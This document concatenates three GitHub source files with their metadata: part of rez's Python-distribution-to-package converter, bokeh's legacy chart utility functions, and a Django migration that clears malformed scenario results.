pkg_version = convert_version(dist.version)
if python_requirement == "major":
pyver = str(sys.version_info[0])
elif python_requirement == "major_minor":
pyver = '.'.join(str(x) for x in sys.version_info[:2])
else:
pyver = python_requirement
pypkg = "python-%s" % pyver
pkg_requires = []
if not make_variant:
pkg_requires.append(pypkg)
for req in dist.requires():
pkg_requires += convert_requirement(req)
pkg_path = _mkdirs(dest_path, pkg_name, pkg_version)
pkg_file = os.path.join(pkg_path, "package.py")
root_path = _mkdirs(pkg_path, pypkg) if make_variant else pkg_path
basename = os.path.basename(dist.location)
is_egg = (os.path.splitext(basename)[1] == ".egg")
if os.path.isdir(dist.location):
if is_egg:
# this is an egg-dir
for file in os.listdir(dist.location):
fpath = os.path.join(dist.location, file)
if os.path.isfile(fpath):
shutil.copy(fpath, root_path)
else:
                    # ignore_patterns expects individual pattern arguments, and
                    # copytree accepts ignore=None when nothing is excluded
                    shutil.copytree(
                        fpath, os.path.join(root_path, file),
                        ignore=(shutil.ignore_patterns(*ignore_dirs)
                                if ignore_dirs else None))
else:
# this is a site dir
egginfo_dir = "%s.egg-info" % dist.egg_name()
eggpath = os.path.join(dist.location, egginfo_dir)
file = os.path.join(eggpath, "installed-files.txt")
if not os.path.isfile(file):
raise RezSystemError(
"There is not enough information on disk to convert the "
"python distribution '%s' into a Rez package. The distribution "
"is installed to a common site, but the installed file "
"information is not present." % name)
with open(file) as f:
installed_files = f.read().strip().split()
dirs = set()
files = set()
for file in installed_files:
path = os.path.join(eggpath, file)
path = os.path.realpath(path)
if os.path.isfile(path) and path.startswith(dist.location + os.sep):
dir_ = os.path.dirname(path)
if ignore_dirs:
reldir = os.path.relpath(dir_, dist.location)
if set(reldir.split(os.sep)) & set(ignore_dirs):
continue
files.add(path)
dirs.add(dir_)
def _dst(p):
dst = os.path.relpath(p, dist.location)
dst = os.path.join(root_path, dst)
return os.path.realpath(dst)
for dir_ in dirs:
dst_dir = _dst(dir_)
_mkdirs(dst_dir)
for file in files:
dst_file = _dst(file)
shutil.copy(file, dst_file)
else:
# this is an egg-file
import zipfile
assert is_egg and os.path.isfile(dist.location)
assert zipfile.is_zipfile(dist.location)
z = zipfile.ZipFile(dist.location)
z.extractall(root_path)
variants_str = "[['%s']]" % pypkg if make_variant else ''
content = textwrap.dedent(
"""
config_version = 0
name = '%(name)s'
version = '%(version)s'
%(variants)s
requires = %(requires)s
def commands():
env.PYTHONPATH.append('{this.root}')
""" % dict(
name=pkg_name,
version=pkg_version,
variants=variants_str,
requires=str(pkg_requires)))
content = content.strip() + '\n'
with open(pkg_file, 'w') as f:
f.write(content)
return pkg_path
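# Minimal usage sketch (the distribution name and destination path are
# hypothetical; the distribution must already be installed and visible to
# pkg_resources):
#
#   pkg_path = convert_dist("some_dist", "/tmp/rez_packages",
#                           make_variant=True, ignore_dirs=["tests"])
#   print("created rez package under %s" % pkg_path)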
| {
"content_hash": "7d41d8c03f5aa817c1599c6ed56a7ac3",
"timestamp": "",
"source": "github",
"line_count": 248,
"max_line_length": 84,
"avg_line_length": 33.068548387096776,
"alnum_prop": 0.5511522985001829,
"repo_name": "nerdvegas/rez",
"id": "904a378709da5d232e9fd26fc1c763030f0d9d16",
"size": "8285",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/rez/utils/py_dist.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "13"
},
{
"name": "CMake",
"bytes": "61812"
},
{
"name": "Dockerfile",
"bytes": "3668"
},
{
"name": "PowerShell",
"bytes": "1390"
},
{
"name": "Python",
"bytes": "1950470"
},
{
"name": "Shell",
"bytes": "3185"
}
],
"symlink_target": ""
} |
""" This is the utils module that collects convenience functions and code that are
useful for the charts ecosystem.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
from collections import OrderedDict
import itertools
from math import cos, sin
from ..browserlib import view
from ..document import Document
from ..embed import file_html
from ..models import GlyphRenderer
from ..models.glyphs import (
Asterisk, Circle, CircleCross, CircleX, Cross, Diamond, DiamondCross,
InvertedTriangle, Square, SquareCross, SquareX, Triangle, X)
from ..resources import INLINE
from ..util.notebook import publish_display_data
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
# TODO: (bev) this should go in a plotting utils one level up
_default_cycle_palette = [
"#f22c40", "#5ab738", "#407ee7", "#df5320", "#00ad9c", "#c33ff3"
]
def cycle_colors(chunk, palette=_default_cycle_palette):
""" Build a color list just cycling through a given palette.
Args:
        chunk (seq): the chunk of elements to generate the color list for
        palette (seq[color]) : a palette of colors to cycle through
    Returns:
        list(color) : a color list with one entry per element in ``chunk``
"""
colors = []
g = itertools.cycle(palette)
for i in range(len(chunk)):
colors.append(next(g))
return colors
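# For example (illustrative), a two-color palette cycled over three elements:
#
#   >>> cycle_colors([1, 2, 3], palette=["red", "green"])
#   ['red', 'green', 'red']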
# TODO: (bev) this should go in a plotting utils one level up
def make_scatter(source, x, y, markertype, color, line_color=None,
size=10, fill_alpha=0.2, line_alpha=1.0):
"""Create a marker glyph and appends it to the renderers list.
Args:
source (obj): datasource object containing markers references.
x (str or list[float]) : values or field names of line ``x`` coordinates
y (str or list[float]) : values or field names of line ``y`` coordinates
markertype (int or str): Marker type to use (e.g., 2, 'circle', etc.)
color (str): color of the points
size (int) : size of the scatter marker
fill_alpha(float) : alpha value of the fill color
line_alpha(float) : alpha value of the line color
Return:
scatter: Marker Glyph instance
"""
if line_color is None:
line_color = color
_marker_types = OrderedDict(
[
("circle", Circle),
("square", Square),
("triangle", Triangle),
("diamond", Diamond),
("inverted_triangle", InvertedTriangle),
("asterisk", Asterisk),
("cross", Cross),
("x", X),
("circle_cross", CircleCross),
("circle_x", CircleX),
("square_x", SquareX),
("square_cross", SquareCross),
("diamond_cross", DiamondCross),
]
)
g = itertools.cycle(_marker_types.keys())
if isinstance(markertype, int):
for i in range(markertype):
shape = next(g)
else:
shape = markertype
glyph = _marker_types[shape](
x=x, y=y, size=size, fill_color=color, fill_alpha=fill_alpha,
line_color=line_color, line_alpha=line_alpha
)
return GlyphRenderer(data_source=source, glyph=glyph)
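# Illustrative usage sketch (field names and data are hypothetical; assumes a
# bokeh ColumnDataSource is used as the data source):
#
#   from bokeh.models import ColumnDataSource
#   source = ColumnDataSource(data=dict(x=[1, 2, 3], y=[4, 5, 6]))
#   renderer = make_scatter(source, 'x', 'y', 'circle', '#407ee7')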
def chunk(l, n):
"""Yield successive n-sized chunks from l.
Args:
        l (list): the incoming list to be chunked
        n (int): length of the chunks
"""
for i in range(0, len(l), n):
yield l[i:i + n]
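# For example (illustrative):
#
#   >>> list(chunk([1, 2, 3, 4, 5], 2))
#   [[1, 2], [3, 4], [5]]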
def polar_to_cartesian(r, start_angles, end_angles):
"""Translate polar coordinates to cartesian.
Args:
r (float): radial coordinate
start_angles (list(float)): list of start angles
        end_angles (list(float)): list of end angles
Returns:
x, y points
"""
cartesian = lambda r, alpha: (r*cos(alpha), r*sin(alpha))
points = []
for start, end in zip(start_angles, end_angles):
points.append(cartesian(r, (end + start)/2))
return zip(*points)
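# Illustrative example: a single wedge from 0 to pi at radius 1 maps to the
# cartesian point at its mid-angle pi/2, i.e. approximately (0.0, 1.0):
#
#   x, y = polar_to_cartesian(1.0, [0.0], [3.141592653589793])
#   # x ~ (0.0,), y ~ (1.0,)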
# TODO: Experimental implementation. This should really be a shared
# pattern between plotting/charts and other bokeh interfaces.
# This will probably be part of the future charts re-design
# to make them inherit from plot (or at least be closer to).
# In this was both charts and plotting could share figure,
# show, save, push methods as well as VBox, etc...
class Figure(object):
def __init__(self, *charts, **kwargs):
self.filename = kwargs.pop('filename', None)
self.server = kwargs.pop('server', None)
self.notebook = kwargs.pop('notebook', None)
self.title = kwargs.pop('title', '')
self.children = kwargs.pop('children', None)
self.charts = charts
self.doc = Document()
self.doc.hold(True)
self._plots = []
# if self.server:
# self.session = Session()
# self.session.use_doc(self.server)
# self.session.load_document(self.doc)
if self.children:
from bokeh.models import VBox
self.doc.add(VBox(children=self.children))
self.plot = None
for i, chart in enumerate(self.charts):
chart.doc = self.doc
if self.server:
chart.session = self.session
# Force the chart to create the underlying plot
chart._setup_show()
chart._prepare_show()
chart._show_teardown()
if not self.title:
self.title = chart.chart.title
self._plots += chart.chart._plots
        # reset the plot title with the one set for the Figure
self.doc._current_plot.title = self.title
def show(self):
"""Main show function.
It shows the Figure in file, server and notebook outputs.
"""
show(self, self.title, self.filename, self.server, self.notebook)
def show(obj, title='test', filename=False, server=False, notebook=False, **kws):
""" 'shows' a plot object, by auto-raising the window or tab
displaying the current plot (for file/server output modes) or displaying
it in an output cell (IPython notebook).
Args:
        obj (Widget/Plot object): the plot object to display.
        title (str, optional): title of the HTML document. Defaults to 'test'.
        filename (str or bool, optional): name of the file to save the plot to.
        server (str or bool, optional): name of the document on the bokeh server.
        notebook (bool, optional): whether to display the plot inline in an IPython notebook.
"""
if filename:
if filename is True:
filename = "untitled"
with open(filename, "w") as f:
f.write(file_html(obj.doc, INLINE, title))
print("Wrote %s" % filename)
view(filename)
elif filename is False and server is False and notebook is False:
print("You have to provide a filename (filename='foo.html' or"
" .filename('foo.html')) to save your plot.")
if server:
obj.session.store_document(obj.doc)
link = obj.session.object_link(obj.doc.context)
view(link)
if notebook:
from bokeh.embed import notebook_div
for plot in obj._plots:
publish_display_data({'text/html': notebook_div(plot)})
| {
"content_hash": "5298d89ade63ddb5e8ad69864059e52b",
"timestamp": "",
"source": "github",
"line_count": 225,
"max_line_length": 87,
"avg_line_length": 33.71111111111111,
"alnum_prop": 0.5774555042847725,
"repo_name": "gpfreitas/bokeh",
"id": "52637502dfcb537d2783b6e1b6f229e1a972c260",
"size": "7585",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh/_legacy_charts/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5455"
},
{
"name": "CSS",
"bytes": "413470"
},
{
"name": "CoffeeScript",
"bytes": "2117773"
},
{
"name": "HTML",
"bytes": "72852"
},
{
"name": "JavaScript",
"bytes": "7337"
},
{
"name": "Makefile",
"bytes": "5785"
},
{
"name": "Python",
"bytes": "1560447"
},
{
"name": "Shell",
"bytes": "18109"
}
],
"symlink_target": ""
} |
from django.db import migrations
def clear_results_with_u_prefix(apps, schema_editor):
    """Reset scenario results that were serialized with Python 2 unicode
    repr prefixes (detected by the ``[{u'`` marker) back to an empty list."""
    Scenario = apps.get_model('modeling', 'Scenario')
for scenario in Scenario.objects.filter(results__contains="[{u'"):
scenario.results = "[]"
scenario.save()
class Migration(migrations.Migration):
dependencies = [
('modeling', '0008_delete_district'),
]
# https://docs.djangoproject.com/en/1.8/topics/migrations/#data-migrations
operations = [
migrations.RunPython(clear_results_with_u_prefix)
]
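# Note: RunPython is given no reverse_code here, so this data migration cannot
# be unapplied; reversing it raises IrreversibleError. A no-op reverse
# (migrations.RunPython.noop) could be supplied if reversibility were needed.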
| {
"content_hash": "407ab93c0f610579ef7f39c0fc35df2a",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 78,
"avg_line_length": 27.4,
"alnum_prop": 0.666058394160584,
"repo_name": "WikiWatershed/model-my-watershed",
"id": "44cd30aca7bbd8afb5d115e3acfa1522b7748c87",
"size": "572",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/mmw/apps/modeling/migrations/0009_scenario_results_to_json.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CartoCSS",
"bytes": "11602"
},
{
"name": "HTML",
"bytes": "1312164"
},
{
"name": "JavaScript",
"bytes": "2286872"
},
{
"name": "Jinja",
"bytes": "8016"
},
{
"name": "Python",
"bytes": "859002"
},
{
"name": "Ruby",
"bytes": "1248"
},
{
"name": "SCSS",
"bytes": "411655"
},
{
"name": "Shell",
"bytes": "20014"
}
],
"symlink_target": ""
} |